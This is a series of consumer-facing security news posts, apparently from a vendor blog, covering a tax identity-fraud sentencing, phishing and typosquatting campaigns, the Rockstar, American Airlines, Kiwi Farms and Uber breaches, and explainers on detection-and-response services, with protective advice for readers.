IT NEWS

The United States Attorney for the Southern District of New York has sentenced Ariel “Melo” Jimenez (38) to 12 years in prison for leading a “tax fraud and identity theft conspiracy” that resulted in the fraudulent claiming of tax credits, earning him millions of dollars.

“Ariel Jimenez was the leader of a long-running fraudulent tax business that cheated the Government of tax refunds by stealing the identities of vulnerable children and using those identities to falsely claim tax credits on behalf of his clients,” said US Attorney General Damian Williams in a press release. “Today’s sentence holds Jimenez accountable for brazenly selling the identities of children to his customers for his own profit.”

Jimenez was arrested with eight of his co-conspirators: Evelin Jimenez and Ana Yessenia Jimenez, his sisters; Ireline Nunez, Leyvi Castillo, Cinthia Federo, Guillermo Arias Moncion, Marcos “Junior” De Jesus Pantaleon, and Jose “Jairo” Castillo. The unsealed complaint mentioned a “corrupt New York City employee” and a “cooperating witness” (CW-1), but it didn’t name them.

Modus operandi

According to the complaint, Jimenez conspired with a fraud investigator (known as “CW-1”) within the New York City Human Resources Administration (HRA) when he established his tax fraud business in 2007 in the Bronx. The NYC HRA is a government organization tasked with providing food and emergency rental assistance for those in need.

CW-1 admitted to stealing children’s data, which comprised their names, dates of birth, and SSNs (Social Security Numbers), from the Welfare Management System and selling these to Jimenez. Jimenez would then list these children as dependents on tax returns Jimenez prepared for his clients. Jimenez and his team are said to have callously referred to these children’s identities as “pollitos” (“little chickens” or “chicks” in Spanish).

Jimenez would charge his clients between $1,000 and $1,500 per child he’d fraudulently add to their tax returns. These children are included as false dependents so the taxpayers (Jimenez’s clients) can file for inflated tax refunds.

“Jimenez’s use of stolen identities harmed the actual caretakers of the children who were fraudulently claimed as dependents,” the press release states. “In some cases, the people actually taking care of these children had much-needed tax refunds delayed and were required to prove their actual connection to their own dependent children.”

A lavish lifestyle

Since setting up his business in 2007, Jimenez has amassed millions of dollars, which he used to purchase real estate and fund a lavish lifestyle. He admitted to spending a total of $5.5M buying properties in the US and abroad and buying jewelry, cars, and gambling. He transferred several properties to his parents to hide his source of funds.

On top of a 12-year sentence, Jimenez was ordered to give up three of his properties and pay forfeiture amounting to $14.580M. He was also ordered to pay restitution for $44,769,906.

There’s been some smart phishing campaigns running over the last few weeks, and this one is particularly sneaky. Bleeping Computer reports that a phishing page is targeting Greek taxpayers with a tax refund scam. The added sting in the tail comes in the form of an embedded keylogger which grabs everything entered onto the page.

An untimely tax refund

The phishing mails rely on that time-honoured tradition of bogus tax returns and non-existent refunds. The landing page, which mimics an official gov.gr portal, reads as follows:

The Hellenic Tax Office has calculated your tax return, you are entitled to a tax refund of Є634.13 (around $633 USD). We have tried to transfer the amount to your account. Unfortunately we were unable to confirm your current account number.

What follows is a drop-down form where the victim can select their bank and “log into the portal”. According to researchers at Cyble, there are several URLs being used to phish victims and they all do a decent job of imitating the real deal. Multiple major banks are listed in the drop-down menu, and the bogus bank pages closely resemble the real thing. Unfortunately for site visitors, this is where the previously mentioned sting in the tail comes into play.

A sneaky way to grab data

Phishing sites typically rely on the visitor hitting the submit button to send their personal information into the hands of the scammers. If someone realises something isn’t quite right at the last minute and abandons ship, the scammers are left with nothing.

In this case, the site has an embedded JavaScript keylogger ticking away in the background. What this means is that anything entered into the various entry boxes is grabbed via the keylogger and immediately sent to the fraudsters. In this scenario, realising something is wrong may not save the victim. Anything they punched into the site up to that point will already be waiting for the phisher to retrieve at their leisure. Sure, they may have only entered information which won’t help attackers, but smart scammers using this technique will likely front load entry forms with the important details first.

What can you do?

Tools used to block third-party trackers reportedly aren’t effective against this kind of embed. With that being the case:

• Tax refunds are rather rare for most people, so question the authenticity of such a claim should you receive one. Contact your local tax authority directly. Many host an up-to-date list of common and current tax scams, which may help to answer your question before you’ve even picked up the phone.

• Rogue attachments are common where fake tax refunds are concerned. If you happen to open a file from someone you weren’t expecting, don’t disable your software’s “read only” mode or its closest equivalent. Steer clear of enabling Macros, too.

• If you believe you’ve entered any data on a phishing site, there’s a small chance it may have a JavaScript keylogger running under the hood. If you know your way around code, you might be able to spot it. If not, you’re left with the hassle of trying to figure out if you need to take some action. Did the site ask for logins upfront, before anything else? Payment details? Certain forms of personal information? It’s time to do a small risk assessment checklist, and then make the appropriate decision as to whether you need to change passwords, cancel your card, or more.

Malwarebytes users are protected from the domains used in this attack. Stay safe out there!

For games publisher Take-Two Interactive, damage control is in full effect as word spreads of a Grand Theft Auto-centric network compromise. Developer Rockstar Games has suffered a major leak of upcoming game content, specifically unfinished video footage of Grand Theft Auto 6. The first anyone knew of the attack was when the person doing the compromising posted their spoils to the popular gaming site GTAForums on Sunday. A very bad weekend lay in store for the embattled game developers.

To the forums!

The post linking the content, now edited, was made to this thread on Sunday with the following message:

Here are 90 footage/clips from GTA 6. 

It’s possible i could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build.

Initially the “leak” was met with scepticism. There’s a long history of pranks and scams where supposedly stolen footage of upcoming Rockstar games are concerned. The stolen footage inevitably turns out to be re-edits of older game footage, or even shoddy looking content put together by the theoretical leaker in game development tools. Indeed, the reactions from multiple posters in the thread itself were dismissive of the content on display. However, they were about to change their tune.

The breach confirmed

It’s never a good sign when an organisation has to post up a tweet like the below:

A Message from Rockstar Games pic.twitter.com/T4Wztu8RW8

— Rockstar Games (@RockstarGames) September 19, 2022

The tweet confirms that Rockstar Games suffered a network intrusion, with an unauthorised third party accessing and downloading confidential information and development footage of the unreleased GTA 6. This tweet comes alongside a security filing which adds a little more detail to the current state of play:

Rockstar Games recently experienced a network intrusion in which an unauthorized third party illegally accessed and downloaded confidential information from its systems, including early development footage for the next Grand Theft Auto. Current Rockstar Games services are unaffected.

We have already taken steps to isolate and contain this incident. Work on the game will continue as planned. At this time, Rockstar Games does not anticipate any disruption to its current services nor any long-term effect on its development timelines as a result of this incident.

There isn’t a lot else to go on at time of writing, with Take-Two Interactive and Rockstar Games getting to grips with figuring out what happened, and if the attacker still has network access. There’s also the possibility of additional content leaks or some form of blackmail. Meanwhile, all we really have from the attacker is that the videos were “downloaded from Slack”. Clearly Rockstar Games will be very busy over the coming days and weeks.

Avoid the inevitable GTA6 scams

The leaked content will almost certainly keep popping up on sites such as YouTube and social media portals. What eager gamers need to watch out for is the scam aspect that will naturally attach itself, limpet style, to the footage. Based on what we’ve seen down the years in relation to gaming leaks, these are some of the things you should be very wary of:

• Nobody is offering up a fully playable version of GTA6 on YouTube or anywhere else. Should you see such a claim, don’t take the bait and ignore/report the video as appropriate.

• There is no leaked early-access style playable demo of the stolen content. Offers of playable GTA6 are almost certainly locked behind survey scams, and/or bundled with malware files. Ignore them.

• On a similar note, emails from strangers claiming to offer up versions of GTA6 either as a download or as part of some sort of subscription service should be given a wide berth.

• Depending on platform or title, you may need to login to Rockstar Social Club to play your Rockstar games. It’s possible phishers may set up a scam which asks for logins in order to access fictitious versions of GTA6. Under no circumstance should you hand out your gaming logins to anybody.

Stay safe out there!

Major airline American Airlines has fallen victim to a data breach after a threat actor got access to the email accounts of several employees via a phishing attack.

According to a published notice of a security incident, the data breach was discovered in July 2022.

How it happened

American Airlines said the successful phishing attack led to the unauthorized access of a limited number of team member mailboxes. American Airlines discovered the breach on July 5, 2022 and immediately secured the impacted email accounts. It then hired a cybersecurity forensic firm to investigate the security incident. A forensic investigation can be a huge help to determine what happened and what the possible consequences of the incident are.

What the attackers had access to

In the notice, American Airlines wrote:

“The personal information involved in this incident may have included your name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information you provided.”

So far, American Airlines has not disclosed the exact number of breached email accounts or how many customers were affected.

Aftermath

American Airlines says it will implement additional technical safeguards to prevent a similar incident from happening in the future.

It offers affected customers a complimentary two-year membership of Experian’s IdentityWorksSM. While we would not recommend paying for such a service, getting it for free may not be a bad deal. Identity theft monitoring services sound great at first, they’re not really expensive and seem to provide peace of mind against an avalanche of ever-more damaging breaches. But they don’t, at present, protect against the worst impacts of identity theft—the theft itself.

American Airlines says it has no evidence that personal information has been abused, but recommends that you enroll in the free credit monitoring. In addition, customers should be extra vigilant, including by regularly reviewing account statements and monitoring free credit reports.

Phishing

We’d like to add that this type of incident often triggers yet another round of phishing attacks, only targeted at potentially affected customers. Typically these phishing mails will try to leverage some kind of urgency to try and trick you. For example, they might urge you to click some link to claim some sort of compensation for the incident. The sense of urgency is something almost all phishing mails have in common: They do not want you to think, just react.

Other signs that something’s phishy:

• The email, text, or voicemail is requesting that you update/fill in personal information. This is especially dubious if it’s coming from a bank or the IRS. Treat any communication asking for your credentials with extra caution.
• The URL shown on the email and the URL that displays when you hover over the link are different from one another.
• The “From” address is an imitation of a legitimate address, especially from a business.
• The formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. Or possibly there are weird paragraph breaks or extra spaces between words. If the email appears sloppy, start making the squinty “this looks suspect” face.
• The content is badly written. Sure, there are plenty of bad writers working for legitimate organizations, but this email might seem particularly amateur. Are there obvious grammar errors? Is there awkward sentence structure, like perhaps it was written by a computer program or someone whose second language is English?
• The email contains attachments from unknown sources that you were not expecting.
• The website you are sent to is not secure. If you do go ahead and click on the link of an email to fill out personal information, be sure you see the “https” abbreviation as well as the lock symbol at the beginning of the URL. If not, that means any data you submit is vulnerable to cybercriminals. (If the link is malicious, Malwarebytes will block the site.)

And each of the above is reason enough to question the legitimacy of the email. Phishers have far evolved past the “Nigerian prince with a treasure” level. Above all else, trust your instincts—if it looks, smells, or feels phishy then it probably is.

Stay safe, everyone!

The operators of a site known to most observers for being in a recent state of flux have announced a forum breach. Kiwi Farms, which gained a reputation for sophisticated trolling and doxxing, was recently dropped by Cloudflare after a sustained campaign to have the DDoS mitigation and cloud hosting service abandon the forum.

The site has since returned, but with a major problem: a breach which potentially reveals a large amount of user data.

The breach revealed

The site creator had the following to say in relation to the compromise:

The forum was hacked. You should assume the following.

Assume your password for the Kiwi Farms has been stolen.

Assume your email has been leaked.

Assume any IP you’ve used on your Kiwi Farms account in the last month has been leaked.

The attack made use of the synergy between the main forum site and a second site, XenForo. The latter is a commercial internet forum software package written in PHP. Attackers created a webpage disguised as an audio file to XenForo, loading this page elsewhere in a manner which caused user authentication cookies to be sent off-site. The main admin account for the forum was apparently hijacked in this same fashion.

The fallout from a forum compromise

We often warn about using forums without implementing the proper failsafes and protection, and a breach such as this hammers home the point. A lot of users on the site may now have a lot of information exposed that they’d really rather not. Similarly, curious observers or even unwary researchers or law enforcement may have registered and not considered the possibility of a data leak.

This data could end up anywhere, and there’s no surefire way to know what’s been taken. It could end up on other forums, data dumps, or in the hands of law enforcement agencies. No matter what site you’re registered on, you should consider:

• Use different passwords for all sites. Once those data dumps go public, cybercriminals will try logging in to other accounts using the same email and username combinations.

• Consider using a VPN, TOR, or some other method to obscure your IP address. Some forums insist on people using their real IP address when registering and posting to a forum, and may even ban or block VPNS, proxies, and other services.

• Be careful what you reveal to other site users via direct messages. People tend to not delete these messages, and sites don’t always auto-prune older messages. It’s also possible sites may store data sent and received, and not even tell you.

It remains to be seen what happens to Kiwi Farms, and the site owner is looking to migrate away from aspects of the site which led to this compromise. For now, it’s a timely reminder to keep on top of potential system vulnerabilities and also consider what data you may be leaving on a site for others to collect at the worst possible moment.

Cyberattacks are rapidly evolving, leaving businesses and their IT security teams to handle immense workloads.

Keeping up with today’s cyberthreats not only involves staying up to date in an ever-changing threat landscape, it also involves managing complex security infrastructure and technologies. Detection and response tools are designed to help security teams monitor, evaluate, and respond to potential threat actor activity.

EDR, MDR, and XDR can alleviate challenges most small business cybersecurity teams face, such as alert fatigue and limited resources.

Although detection and response tools share similar purposes, they are not all equal. Every threat detection and response capability has its own advantages when it comes to addressing the needs of your business and catching threats that have thwarted traditional security layers.

Let’s dive into the basics of three common detection and response solutions.

Endpoint Detection and Response (EDR)

Endpoint detection and response (EDR) solutions cover all endpoint monitoring and activity through threat hunting, data analysis, and remediation to stop a range of cyberattacks. These attacks include malware, ransomware, brute force, and zero-day intrusions.

Managed Detection and Response (MDR)

Managed detection and response (MDR) is a service that offers a suite of outsourced capabilities to deliver round-the-clock, 24/7/365 monitoring and detection, proactive threat hunting, prioritization of alerts, correlated data analysis, managed threat investigation, and remediation. MDR is popularly thought of as an in-house Security Operations Center (SOC) alternative. It blends a human element of highly-skilled experts with threat intelligence technologies.

Extended Detection and Response (XDR)

Extended detection and response (XDR) is a proactive cybersecurity solution that provides improved, unified visibility over endpoints, networks, and the cloud through aggregating siloed data across an organization’s security stack.

What is the difference between EDR vs MDR vs XDR?

Today’s industry-leading detection and response technologies rely on threat intelligence data pulled from different sources. This threat intel data varies in readability and usefulness depending on the tool and its intended audience, your security team, decision-makers, or key stakeholders. Not all businesses have the cybersecurity resources to interpret copious amounts of data, investigate alerts, and act on threats.

Let’s compare threat detection and response tools and the challenges they address.

EDR vs MDR

The difference between EDR and MDR is scale.

The needs of your organization, the number of assets and endpoint devices to protect, available resources, bandwidth, and in-house cybersecurity skill level are all factors to consider when it comes to MDR vs EDR. Addressing your business’ security challenges is crucial to understanding how much visibility your company really needs, doing so will help determine the detection and response technology best fit for your business and enhance your cybersecurity stack.

EDR has several benefits and provides holistic visibility into the attack surface of all your endpoints and can detect threats that circumvent legacy endpoint protection platforms (EPP). Endpoint Detection and Response is a staple for establishing a comprehensive security strategy and lays the groundwork for scalable cybersecurity maturity. Although fundamental, it generates a lot of alerts and endpoint telemetry data, adding to its complexity. It requires skilled cybersecurity talent who can readily handle high alert volume, interpret EDR alerts, and respond proficiently. The key takeaway is that standalone EDR products help businesses wanting to enhance their endpoint security posture but require a level of resources and advanced cybersecurity personnel.

MDR security is a managed service which merges human expertise with threat intelligence, offering advanced threat hunting, threat identification, alert prioritization, and incident response. MDR helps businesses obtain outsourced, high-skilled cybersecurity experts at an affordable cost. Regardless of size and level of expertise, your current IT team can leverage a turnkey experience with Managed Detection and Response to close the skill gap in specialized security talent. Small businesses seeking to build security maturity, handle complex threats, and relieve in-house alert fatigue, have everything to gain from Managed Detection and Response.

MDR vs XDR

XDR works to consolidate alerts and unify previously siloed data from a range of cybersecurity tools. Businesses struggling with an influx of alerts across multiple existing security tools have the most to benefit from XDR solutions. Providing extended visibility, the tool is centered on aggregating and correlating telemetry from various security tools and enhancing defense across the security ecosystem.

Extended Detection and Response addresses the challenges of businesses with multilayered security architecture.

Tips for choosing a threat detection and response tool for your business

Choosing the right detection and response tool starts with addressing your business’ security needs at scale. Simply put, your organization should consider the following questions:

• What does my company need to protect? What assets are most vulnerable to being compromised?
• How much visibility does my organization need?
• Does my security team have the skillset, time, and bandwidth to handle large security workloads?
• What are the resource constraints of my organization?
• Who will be analyzing, investigating, and responding to detected threats, alerts, and data?

Featured articles 

What is Threat Hunting?

3 ways MDR can drive business growth for MSPs

Cyber threat hunting for SMBs: How MDR can help

What is Threat Intelligence?

What is MDR?

What is SIEM?

What is SOC?

Webinar: Malwarebytes EDR Product Demo

Last week on Malwarebytes Labs:

• The North Face hit by credential stuffing attack
• Facebook engineers aren’t sure where all user data is kept
• 6 patch management best practices for businesses
• The MSP playbook on deciphering tech promises and shaping security culture
• Apple puts the password on life support with passkey
• BackupBuddy WordPress plugin vulnerable to exploitation, update now!
• Update now! Google patches vulnerabilities for Pixel mobile phones
• Important update! iPhones, Macs, and more vulnerable to zero-day bug
• Steam account credentials phished in browser-in-a-browser attack
• How to help your child manage their online reputation
• WPGateway WordPress plugin vulnerability could allow full site takeover
• Update now! Microsoft patches two zero-days
• The privacy concerns of tying SIM cards to real identities
• 5 technologies that help prevent cyberattacks for SMBs
• Malvertising on Microsoft Edge’s News Feed pushes tech support scams
• Cyber threat hunting for SMBs: How MDR can help
• Here are the new security and privacy features of iOS 16
• Explained: Fuzzing for security
• School app Seesaw compromised to send shock NSFW image
• Uber hacked
• 3 ways MDR can drive business growth for MSPs

Stay safe!

Ethical hacker and security researcher Kody Kinzie shared with BleepingComputer a list of over 50 domains of which many are spelling variations of the brand name Sniffies.

Sniffies identifies itself as a “modern, map-based, meetup app for gay, bi, and curious guys.”

Kody used an open source tool called DNSTwist to generate a list of lookalike domains for Sniffies.com. Out of the 3531 possibilities generated by the tool, 51 represented valid domains.

“I saw a good amount of domains registered with the same MX server set up, even though the domains were hosted on random platforms.”

A mail exchanger record (MX record) specifies the mail server responsible for accepting email messages on behalf of a domain name. So that would imply that the domains were set up by the same threat-actor.

Typosquatting

Typosquatting is a term you may have seen when reading about Internet scams. In essence it relies on users making typing errors (typos) when entering a site or domain name. Sometimes it is also referred to as URL hijacking or domain mimicry, but IMHO the word typosquatting more accurately describes the matter. As you will understand, the success of a typosquat scammer depends on the number of victims that are likely to misspell the intended domain and land on the scammers’ pages.

One factor is the popularity of the domain. With an estimated number of 79,600 visitors per day, Sniffies certainly qualifies in that department.

Advertising

BleepingComputer’s test results were described as:

“Once accessed, the illicit ‘Sniffies’ copycat domains do one of the following things:

• Push the user to install dubious Chrome extensions
• Launch the ‘Music’ App on Apple devices right from the web browser
• Lead the users to bogus technical ‘support’ scam sites
• Lead the users to fake job posting sites”

Obviously, we did some testing of our own. We found some domains that had either been abandoned or parked for the future, but some did what they were set up for—redirect visitors based on some basic system properties and the location (based on IP address).

Most of the redirects we found at Malwarebytes went to advertising sites that were more or less legitimate. But certainly not what the user would be looking for. Many shared this look, offering the visitor a few choices.

In one instance (Dutch IP, Windows system) we were redirected to a fake Microsoft Defender warning site (including soundtrack and locked screen), parked in the domain ondigitalocean.app which has been on Malwarebytes’ radar for some time.

We also found one of the Chrome extensions that BleepingComputer described as dubious. Malwarebytes detects these extensions as PUP.Optional.AdMax.

Mitigation

While it’s certainly nice to read how these campaigns work and how the research was done, Sniffies is just an example of what is out there.

To avoid falling victim to typosquatters, there are a few basic measures you can take, which are in essence aimed at not typing the url.

• Bookmark your favorites
• Use search results rather than typing the url in the address bar
• Leave some or all of the sites that you visit every day open in your browser tabs (most popular browsers offer the option to continue where you left off or to specify a set of sites to start with)
• Never click links in unexpected emails or on unknown sites
• Use an antivirus or anti-malware solution that offers web protection and preferably even an anti-exploit solution.

Stay safe, everyone!

The managed service provider market is growing rapidly. As cyberattacks continue to increase worldwide, more and more small-and-medium-sized businesses (SMBs) are looking to MSPs to take the load off when it comes to securing their business. 

With more business, of course, comes more competition—and what better way to whet your competitive edge than to offer security services that SMBs desperately need?

It’s a no-brainer. By focusing on the specific security needs of their customers, MSPs can attract and retain the 91% of SMBs who would consider switching service providers if another one offered the “right” cybersecurity services.

Okay, but that begs the question: Exactly what security service should MSPs be offering to their clients? Endpoint protection, EDR, and VPM services are high-up there—but you may not know that Managed Detection and Response (MDR) is another must-have.

MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack. Gartner reports that, by 2025, 50% of organizations will be using MDR services for threat monitoring, detection, and response functions that offer threat containment capabilities.

The core service capabilities of MDR include:

• 24×7 monitoring of an organization’s environment for threats.

• Threat detection, alerting, and response from highly experienced security analysts.

• Correlation of endpoint alerts with other data sources to identify threats and response measures more effectively.

• Proactive cyber threat hunting based on past indicators of compromise (IOCs)

While it’s technically possible for MSPs to build out their own MDR program in-house, doing so takes the same time, expense, and effort as starting an entirely new IT security department. You’ll need to build out your own security operations center (SOC) facilities, hire a minimum of five full-time employees to provide 24/7 coverage, and so on.

In short, the expertise and infrastructure required for MDR is why many MSPs opt to outsource their MDR to a service provider. 

Here are three ways MDR can drive business growth for MSPs.

1. Minimize dwell time

In the cybersecurity world, dwell time is the time that elapses between a malware or an attacker infiltrating a system and when they are detected (and removed).

The longer the dwell time, the longer an attacker has to elevate their privileges and move deeper into a network in search of sensitive data and other high-value assets. We call this lateral movement—and MDR can nip it in the bud, preventing a potential data breach. It’s all made possible by threat hunting. 

Threat hunting typically includes two essential functions in the delivery of MDR services:

• A research-based approach, where security analysts look, or “hunt,” for known attackers or adversarial behaviors listed in threat intelligence services. 

• An active hunting approach, where security analysts systematically review your organization’s environment to uncover any current suspicious activity or newly emerging indicators of compromise (IOCs) that are in progress.  

Because both research-based and active threat hunting can stop an attacker before they exfiltrate data or deploy ransomware, outsourcing your threat hunting can greatly help control infections for your MSP clients. And if you have a reputation for letting fewer threats through than your competitors, you’ll likely attract more business.

Read: Cyber threat hunting for SMBs: How MDR can help

2. Overcome alert fatigue

Let’s say your MSP business serves more than 60 customers, ranging from small businesses with a handful of employees to larger companies with about 150 users. 

Every day, your small team works to protect thousands of endpoints, and deals with an ever-growing number of alerts.

With constant alerts demanding attention, MSP security analysts end up being overworked and exhausted, reducing their ability to properly identify and triage alerts to prevent malware infections and the spread of damage. That can lead to missed threats getting through to clients—ultimately leading to data loss and downtime for their organizations.

By outsourcing your MDR, your environment is monitored 24x7x365 by a team of advanced cybersecurity analysts. Rather than scrambling to identify and understand critical threat alerts, your MSP team receives notifications from the MDR team with guidance to remediate critical threats.

Not only can this increase your team’s morale and job satisfaction, but it also opens your team’s resources to focus on net new billable projects.

3. Increases customer satisfaction and MRR

If you’re an MSP, you might find three ways to take your business to the next level:

• Increasing your number of customers offers increased monthly recurring revenue (MRR) and diversifies your client base, but providing the services businesses are looking for could require extra staff.

• Recruiting larger customers could increase MRR at a lower marginal cost than serving multiple small clients, but a larger client could require more resources to properly manage.

• Upselling existing customers would allow your MSP to build upon your current customer base, but it will require a compelling value proposition to encourage satisfied customers to increase their monthly spend.

Finding an offering that provides 24x7x365 security is a great way to increase your number of customers, recruit larger customers, and upsell existing customers all at once—and MDR can make it happen. Specifically, other than 24×7 real-time threat detection and threat hunting, MDR offers a few other key features that businesses of all sizes are looking for:

• Threat intelligence: Provides insights into who attackers are, where they can access the network, and specific actions that can be taken to strengthen defenses against a future attack. 

• Effective threat response: An MDR service provider with top-tier security analysts will have the skills to tackle complex threats. This will reduce an organization’s mean time to respond (MTTR).

• Reporting: MDR service providers give transparent and consistent communication, sharing details about their threat detection and giving expert guidance on responding to and remediating security threats.

By outsourcing your MDR, you can offer all of these in-demand activities for current and prospective clients without needing your own in-house MDR tools and staff.

Transform your MSP business with MDR

The threat hunting, threat intelligence, and threat response capabilities of MDR make it a must-have solution for any security-minded SMB. Likewise, with the demand for MDR services on the rise, MSPs would be wise to include it in their security portfolio. 

For many MSPs, however, delivering MDR services isn’t possible with their current staff and tools. 

Partnering with an MDR vendor provides several key advantages, giving you fast time-to-market to immediately address market demand and enabling you to offer a service that has top-tier professionals and uses the best security tools. 

Want to learn more about the tools MDR analyst use to detect and respond to threats? Checkout our webinar: Malwarebytes for Business Demo.

Featured articles 

What is Threat Hunting?

Cyber threat hunting for SMBs: How MDR can help

What is Threat Intelligence?

What is MDR?

What is SIEM?

What is SOC?

Webinar: Malwarebytes EDR Product Demo

Uber informed the public on Thursday it was responding to a cybersecurity incident after somebody breached its network. From what we have been able to find out so far, the attacker managed to compromise an employee’s access to the chat app Slack. The intruder may also have gained access to the Amazon and Google-hosted cloud environments where Uber stores its source code and customer data, and to the company’s HackerOne account, which contains information about security flaws in its products.

We are currently responding to a cybersecurity incident. We are in touch with law enforcement and will post additional updates here as they become available.

— Uber Comms (@Uber_Comms) September 16, 2022

There has been no indication that Uber’s fleet of vehicles or its operation was affected.

Security researchers that spoke with the hacker, who claims to be 18 years of age, are under the impression that the threat actor’s main motive seems to be to show off what he did. The person also said Uber drivers should receive higher pay.

A highly respected source revealed that the threat actor spammed an employee with MFA push requests, an established tactic that can defeat some kinds of multi-factor authentication by simply annoying a victim into submission. This type of MFA sends a notification to a user whenever their username and password are used. The user has to approve the login by pressing a button on a smartphone app. The idea is that a stolen username and password are useless to an attacker unless they also have physical access to the victim’s phone. It doesn’t always work like that though. Unfortunately, some criminals have learned that they can batter people into submission by repeatedly using the username and password until the victim approves the login just to make the notifications stop.

In this case the attacker reportedly contacted the employee on WhatsApp and told them they had to accept the requests to make them stop, at which point the victim did as instructed.

Slack

Slack is a messaging system that’s widely used by, and within, tech companies as an alternative to email. It allows direct messages between individuals, and conversations among groups of people take place in channels dedicated to specific topics or areas of concern. Channels contain a complete history of every conversation they have ever hosted, and may contain sensitive or valuable information. In other words, Slack can be a potential gold mine for an attacker looking to expand their access and impact.

The New York Times reports that Uber was forced it to take several internal communications and engineering systems offline after the attacker used Slack to send a message to Uber employees.

The Slack message, including spelling errors, read:

“I announce I am a hacker and uber has suffered a data breach. Slack has been stolen, confidential data with Confluence, stash and two monorepos from phabricator have also been stolen, along with secrets from sneakers. #uberunderpaisdrives”

The message was received as a joke by Uber’s employees in the Slack channel at first, but people soon started realizing the claims were serious. To prove that the intruder really had access they posted a photo on an internal information page for employees, as well as screenshots of the Uber AWS instance, HackerOne administration panel, and more.

HackerOne is a vulnerability coordination and bug bounty platform that connects businesses who want to know about security issues in their products with penetration testers and cybersecurity researchers looking to be rewarded for their bug-hunting efforts.

I suppose if there is one thing you don’t want a hacker to get their hands on, it’s the company’s HackerOne administration panel. Imagine someone having access to a list of unfixed security vulnerabilities affecting your organization, alongside proof-of-concept code that can exploit them.

We reached out to HackerOne to ask about the security measures that apply to a company account. We are awaiting their response.

No hush, hush this time

Uber famously covered up a 2016 data breach that affected its 57 million customers and drivers. The company hid the incident from the public and paid the hackers $100,000 to delete the data and keep quiet. That Uber hack came to light after new leadership took over the company in 2017, a year after the incident occurred. Uber settled the case with the DOJ (US Department of Justice) and paid  $148M for civil litigation settlement.